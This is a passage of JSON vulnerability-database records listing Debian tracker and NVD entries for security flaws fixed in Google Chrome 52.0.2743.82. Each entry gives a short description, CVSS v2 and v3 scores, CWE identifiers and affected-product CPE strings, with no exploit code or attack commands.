"scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-5127", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5127"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-5127", "href": "https://security-tracker.debian.org/tracker/CVE-2016-5127", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:15", "description": "Multiple unspecified vulnerabilities in Google Chrome before 52.0.2743.82 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-1705", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1705"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-1705", "href": "https://security-tracker.debian.org/tracker/CVE-2016-1705", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-17T19:29:32", "description": "The CSPSource::schemeMatches function in WebKit/Source/core/frame/csp/CSPSource.cpp in the Content Security Policy (CSP) implementation in Blink, as used in Google Chrome before 52.0.2743.82, does not apply http :80 policies to https :443 URLs and does not apply ws :80 policies to wss :443 URLs, which makes it easier for remote attackers to determine whether a specific HSTS web site has been visited by reading a CSP report. 
NOTE: this vulnerability is associated with a specification change after CVE-2016-1617 resolution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-5137", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1617", "CVE-2016-5137"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-5137", "href": "https://security-tracker.debian.org/tracker/CVE-2016-5137", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-17T19:29:32", "description": "net/proxy/proxy_service.cc in the Proxy Auto-Config (PAC) feature in Google Chrome before 52.0.2743.82 does not ensure that URL information is restricted to a scheme, host, and port, which allows remote attackers to discover credentials by operating a server with a PAC script, a related issue to CVE-2016-3763.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, 
"privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-5134", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3763", "CVE-2016-5134"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-5134", "href": "https://security-tracker.debian.org/tracker/CVE-2016-5134", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2023-06-03T14:36:26", "description": "Use-after-free vulnerability in extensions/renderer/user_script_injector.cc in the Extensions subsystem in Google Chrome before 52.0.2743.82 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to script deletion.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-5136", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": 
true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5136"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-5136", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5136", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:28:05", "description": "ios/web/web_state/ui/crw_web_controller.mm in Google Chrome before 52.0.2743.82 on iOS does not ensure that an invalid URL is replaced with the about:blank URL, which allows remote attackers to spoof the URL display via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-1707", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1707"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-1707", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1707", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:36:24", "description": "The Service Workers subsystem in Google Chrome before 52.0.2743.82 does not properly implement the Secure Contexts specification during decisions about whether to control a subframe, which allows remote attackers to bypass the Same Origin Policy via an https IFRAME element inside an http IFRAME element.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-5132", "cwe": ["CWE-254"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5132"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-5132", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5132", "cvss": {"score": 6.8, "vector": 
"AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:28:06", "description": "The PPAPI implementation in Google Chrome before 52.0.2743.82 does not validate the origin of IPC messages to the plugin broker process that should have come from the browser process, which allows remote attackers to bypass a sandbox protection mechanism via an unexpected message type, related to broker_process_dispatcher.cc, ppapi_plugin_process_host.cc, ppapi_thread.cc, and render_frame_message_filter.cc.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-1706", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1706"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-1706", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1706", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:36:25", "description": "objects.cc in 
Google V8 before 5.2.361.27, as used in Google Chrome before 52.0.2743.82, does not prevent API interceptors from modifying a store target without setting a property, which allows remote attackers to bypass the Same Origin Policy via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-5128", "cwe": ["CWE-254"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5128"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106", "cpe:/a:google:v8:5.2.360"], "id": "CVE-2016-5128", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5128", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*", "cpe:2.3:a:google:v8:5.2.360:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:36:27", "description": "Google Chrome before 52.0.2743.82 mishandles origin information during proxy authentication, which allows man-in-the-middle attackers to spoof a proxy-authentication login prompt or trigger incorrect credential storage by modifying the client-server data 
stream.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-5133", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5133"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-5133", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5133", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:28:05", "description": "The Chrome Web Store inline-installation implementation in the Extensions subsystem in Google Chrome before 52.0.2743.82 does not properly consider object lifetimes during progress observation, which allows remote attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-1708", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1708"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-1708", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1708", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:28:05", "description": "Heap-based buffer overflow in the ByteArray::Get method in data/byte_array.cc in Google sfntly before 2016-06-10, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted SFNT font.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-1709", "cwe": ["CWE-119"], "bulletinFamily": 
"NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1709"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:sfntly:-", "cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-1709", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1709", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:sfntly:-:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:36:25", "description": "Google V8 before 5.2.361.32, as used in Google Chrome before 52.0.2743.82, does not properly process left-trimmed objects, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-5129", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5129"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106", "cpe:/a:google:v8:5.2.360"], "id": "CVE-2016-5129", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5129", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*", "cpe:2.3:a:google:v8:5.2.360:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:28:05", "description": "The ChromeClientImpl::createWindow method in WebKit/Source/web/ChromeClientImpl.cpp in Blink, as used in Google Chrome before 52.0.2743.82, does not prevent window creation by a deferred frame, which allows remote attackers to bypass the Same Origin Policy via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-1710", "cwe": ["CWE-285"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1710"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-1710", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1710", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:36:25", "description": "content/renderer/history_controller.cc in Google Chrome before 52.0.2743.82 does not properly restrict multiple uses of a JavaScript forward method, which allows remote attackers to spoof the URL display via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-5130", "cwe": ["CWE-284"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5130"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/a:google:chrome:51.0.2704.106"], "id": "CVE-2016-5130", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5130", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": 
["cpe:2.3:a:google:chrome:51.0.2704.106:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:36:24", "description": "Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "cve", "title": "CVE-2016-5131", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5131"], "modified": "2019-03-26T17:14:00", "cpe": ["cpe:/o:suse:linux_enterprise:12.0", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:xmlsoft:libxml2:2.9.4", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:opensuse:opensuse:13.2", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:opensuse:leap:42.1", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2016-5131", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5131", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:a:xmlsoft:libxml2:2.9.4:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise:12.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:36:28", "description": 